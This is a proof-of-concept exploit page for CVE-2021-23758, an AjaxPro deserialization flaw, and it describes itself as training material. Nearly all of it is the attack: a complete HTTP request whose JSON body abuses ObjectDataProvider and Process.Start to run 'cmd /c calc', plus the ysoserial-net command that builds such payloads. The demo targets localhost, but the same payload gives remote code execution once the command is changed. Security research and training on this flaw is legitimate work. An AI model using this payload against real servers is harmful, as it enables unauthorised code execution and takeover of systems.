Share
## https://sploitus.com/exploit?id=9C5F7BCE-0D32-524F-AFDE-810763D8D028
# CVE-2021-23758-POC
this repo has been created for training on the vulnerability in the ajaxpro. disclosed with the ID number CVE-2021-23758.
# POC
```
POST /ajaxpro/CVE_2021_23758_POC.demo,CVE_2021_23758.ashx HTTP/2
Host: localhost:44375
Content-Length: 567
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
X-Ajaxpro-Method: TestAjax
Content-Type: text/plain; charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://localhost:44375
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://localhost:44375/demo
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
{"obj":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo": {
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd",
"Arguments":"/c calc"
}
}
}}
```
```
ysoserial-net -g ObjectDataProvider -f JavaScriptSerializer -c "calc" -o raw
```
![Back-Code](img/repo.jpg?raw=true "B-Code")
![Code](img/code.jpg?raw=true "Code")
![Exploit](img/calc.jpg?raw=true "Calc")
# Reference
* [2021-23758 Mitre](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-23758)
* [michaelschwarz/Ajax.NET-Professional](https://github.com/michaelschwarz/Ajax.NET-Professional)
* [Details](https://mp.weixin.qq.com/s/7y-iyMMZAoN4B2dGvCFvXg)
* [sirifu4k1 tweet](https://twitter.com/sirifu4k1/status/1470647490546393089)
* [ysoserial](https://github.com/pwntester/ysoserial.net)